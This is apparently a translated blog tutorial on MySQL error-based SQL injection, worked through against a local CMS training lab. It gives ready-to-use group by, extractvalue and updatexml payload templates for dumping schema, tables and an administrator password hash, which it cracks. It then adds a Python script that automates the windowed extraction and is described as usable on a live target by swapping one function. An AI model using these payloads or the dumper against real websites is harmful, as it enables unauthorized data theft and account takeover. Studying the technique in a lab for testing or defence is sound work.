MySQL error injection

Error injection

While probing the injection point, we find that the page displays the database's own SQL error messages. That makes error-based injection possible: the error text becomes the channel through which query results are read back.

The principle of error-based injection is to make MySQL raise an error whose message contains the result of a subquery we control; with extractvalue()/updatexml(), for example, an invalid XPath expression assembled by concat() is quoted verbatim in the "XPATH syntax error" message. There are many ways to trigger such an error and the details differ between them. In practice, memorise the payload templates below and substitute them for the condition at the injection point (for example, in place of the 1=1 in a test payload such as and 1=1).

Common method

group by (duplicate-key error: floor(rand()*2) is re-evaluated while grouping, so the same key is inserted twice; the table in the FROM clause needs at least three rows, which is why information_schema.tables is used)

?id=33 and (select 1 from (select count(*),concat(0x5e,(select database()),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)

?id=33 and (select 1 from (select count(*),concat(0x5e,(select password from cms_users limit 0,1),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)

extractvalue (the third argument of substr() is a length, not an end position; 17,16 returns characters 17 to 32)

?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))
?id=33 and extractvalue(1,concat(0x5e,substr((select password from cms_users),17,16),0x5e))

updatexml

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,16) from cms_users),0x5e),1)

Case environment

PHP environment: phpstudy20261103.exe

Target lab: cms

Download: https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?pwd=jap0
Extraction code: jap0

Goal: obtain the password (hash) of the site's backend administrator account

The URL with SQL injection in the cms target lab: http://localhost/cms/cms/show.php?id=33

Note: the XPATH syntax error quotes at most 32 characters of the offending string, so with one ^ marker in front only 31 characters of data are visible per request (this is a limit of the error message, not of concat()). Longer values must therefore be read with substr() in 31-character windows, moving the start position forward each time. Also, the scalar subquery inside concat()/substr() must return exactly one row; against a multi-row table add limit 0,1 (as in the group by payload above), otherwise MySQL reports "Subquery returns more than 1 row" instead of leaking data.

Check database

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
or
?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))


Check tables

-- characters 1 to 31
?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(table_name),1,31) from information_schema.tables where table_schema = database()),0x5e))

-- characters 32 to 62
?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(table_name),32,31) from information_schema.tables where table_schema = database()),0x5e))


Check columns (move the substr() start forward by 31 if the column list does not fit in one window)

?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(column_name),1,31) from information_schema.COLUMNS where table_schema = database() and table_name = "cms_users"),0x5e))


Check data (password)

?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,16) from cms_users),0x5e),1)

Password characters 1-16:

e10adc3949ba59ab

Password characters 17-32:

be56e057f20f883e

Concatenated hash: e10adc3949ba59abbe56e057f20f883e

cmd5 lookup: the 32-character hex string is an unsalted MD5 digest, and this particular value is the well-known MD5 of 123456, so any lookup table such as cmd5 returns the plaintext immediately.
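The whole procedure above (build the payload, read the quoted XPath string out of the error, step the 31-character substr() window forward, reassemble) is mechanical, so it is worth automating. The following is an added example written for this page, not code from the original post: it generates the page's extractvalue/updatexml payloads for each window and parses the leaked chunk from the error text. Because no database is available here, a constructed oracle stands in for the vulnerable show.php page and reproduces MySQL's 32-character truncation of the XPATH syntax error; the hash it "leaks" is the one the page recovered. The parameter name id=33, the ^ (0x5e) marker and the subquery texts are taken from the page; the function names and the oracle are assumptions of this example.

```python
import re

MARK = "^"                          # the 0x5e delimiter used in the page's payloads
ERROR_LIMIT = 32                    # MySQL quotes at most 32 chars of the bad XPath string
WINDOW = ERROR_LIMIT - len(MARK)    # 31 chars of data fit after the leading '^'


def build_payload(expr, start, length=WINDOW, func="extractvalue"):
    """Fill the page's extractvalue/updatexml template with a substr() window.

    expr is the scalar subquery to leak, e.g. "select database()". It must
    return a single row; add `limit 0,1` when the table has several rows.
    """
    inner = f"concat(0x5e,substr(({expr}),{start},{length}),0x5e)"
    if func == "updatexml":
        return f"?id=33 and updatexml(1,{inner},1)"
    return f"?id=33 and extractvalue(1,{inner})"


def make_oracle(secret):
    """Constructed stand-in for the vulnerable page (no real database here).

    It reads the substr() window out of the payload, applies it to `secret`
    and echoes the error MySQL would print, including the 32-char truncation.
    """
    def oracle(payload):
        m = re.search(r",(\d+),(\d+)\),0x5e\)", payload)
        start, length = int(m.group(1)), int(m.group(2))
        chunk = secret[start - 1:start - 1 + length]
        xpath = (MARK + chunk + MARK)[:ERROR_LIMIT]
        return f"XPATH syntax error: '{xpath}'"
    return oracle


def parse_leak(response):
    """Pull the leaked data out of the quoted XPath string.

    Returns None when the response carries no XPATH error, e.g. because the
    subquery returned more than one row and MySQL raised a different error.
    """
    m = re.search(r"XPATH syntax error: '\^([^']*)'", response)
    if not m:
        return None
    data = m.group(1)
    # The closing '^' only survives truncation when the chunk is shorter than 31 chars.
    if data.endswith(MARK):
        data = data[:-1]
    return data


def dump(expr, send, func="extractvalue"):
    """Slide the 31-char window over the whole value until a short chunk arrives."""
    out, start = "", 1
    while True:
        leaked = parse_leak(send(build_payload(expr, start, WINDOW, func)))
        if leaked is None:
            raise RuntimeError("no XPATH error in response; check the subquery")
        out += leaked
        if len(leaked) < WINDOW:   # a short (or empty) chunk means the value is exhausted
            return out
        start += WINDOW


if __name__ == "__main__":
    # Constructed target: the hash the page recovered, served by the fake oracle.
    fake_site = make_oracle("e10adc3949ba59abbe56e057f20f883e")
    query = "select password from cms_users limit 0,1"
    print(build_payload(query, 1))
    print(dump(query, fake_site))
```

Against a live target, `send` would be a function that issues the HTTP request with the payload appended to the vulnerable URL and returns the response body; everything else stays the same. The marker must be a character that cannot occur in the leaked data, which holds for hex digests and identifiers but should be rechecked before dumping free-text columns.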


Source: blog.csdn.net/weixin_46367450/article/details/132460996